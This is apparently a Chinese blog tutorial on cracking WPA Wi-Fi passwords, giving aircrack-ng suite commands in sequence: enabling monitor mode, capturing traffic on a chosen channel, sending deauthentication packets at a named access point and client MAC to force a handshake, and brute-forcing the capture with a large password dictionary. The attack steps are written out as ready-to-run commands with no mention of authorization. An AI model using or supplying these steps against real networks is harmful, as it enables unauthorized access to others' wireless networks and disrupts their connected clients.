wifi破解

wi-fi


wKiom1Wb2CHz4RcqAAEu7tyPS-M581.jpg


你通过手上现有的接收端,去搜索到其他他送端发送的信号,拿到手上之后,利用手上的工具和命令讲获取到的信号破解掉

需要一个接受段,可以接受到发送的信号


无线的加密类型

wKiom1Wb19uQLr7AAAH88nTqbr4304.jpg


wKiom1Wb16fDJ_IjAAE_ojaxhf8657.jpg


杂合模式是为了手机到更多的信号

airmon-ng start wlan0 up

ifconfig 看到mon0 说明开启混杂模式成功

wKioL1Wb2cygjch3AAHPPVeCnJ8336.jpg

 

看开启了混杂模式的网卡收集到了哪些信号

airodump-ng mon0 

wKiom1Wb2A-zH56VAANPN99UtYA161.jpg

<length: 8> 表示有8个字节 隐藏了ssid 这种的依然能够破解,以后说明、

BSSIDMAC地址

CH :表示信道 

 

bdqntest第一个信道为例

airodump-ng -w test.cap -c 6 mon0

-w 保存的数据包路径

-c 指定6信道

输入命令后如图下面的第二块也有一个BSSID,还有一个STATION(跟的是正在连接的客户端的MAC地址)

wKioL1Wb2enRA65-AAJMNp8Nwbs118.jpg

aireplay-ng  -0  10  -a  52:BD:5F:1F:07:98  -c  0c:60:76:2F:57:26 mon0

-0 发包次数,即进行注入攻击

-a apmac

-c 客户端的mac

wKiom1Wb2BSSkgkCAAE7D3LfvGA229.jpg


开一个窗口慢慢抓的,一边抓,一边打

wKioL1Wb2dXxPlmDAAJQDAUSeeE425.jpg

ls 可以看到 每次抓到的包,第一次命名成01第二回命名成02。。。。。


wKiom1Wb1_XT6epYAAGOZJaC6Qk374.jpg

攻击到出正在抓包的那个窗口的右上角出现wpa handshake52:BD:5F:1F:07:98 表示抓握手包成功

wKioL1Wb2fWzKBObAAHQXgRTmAA927.jpg

aircrack-ng -w 1.txt test*.cap

-w 指定字典

后面指定攻击的包文件

wKiom1Wb1-vwDd_xAAFAdzuiof8683.jpg

wKioL1Wb2YyxHTX3AAKOjY2LBZs493.jpg

输入9回车

然后就开始破解了,字典要给力,我这里的都搞的几十G的密码字典


wKioL1Wb2ZSQAr4zAAE2x4rMBRc600.jpg


wKioL1Wb2bChDUzdAAETv5N03Gg859.jpg










你可能感兴趣的:(加密,wifi,客户端,start,数据包)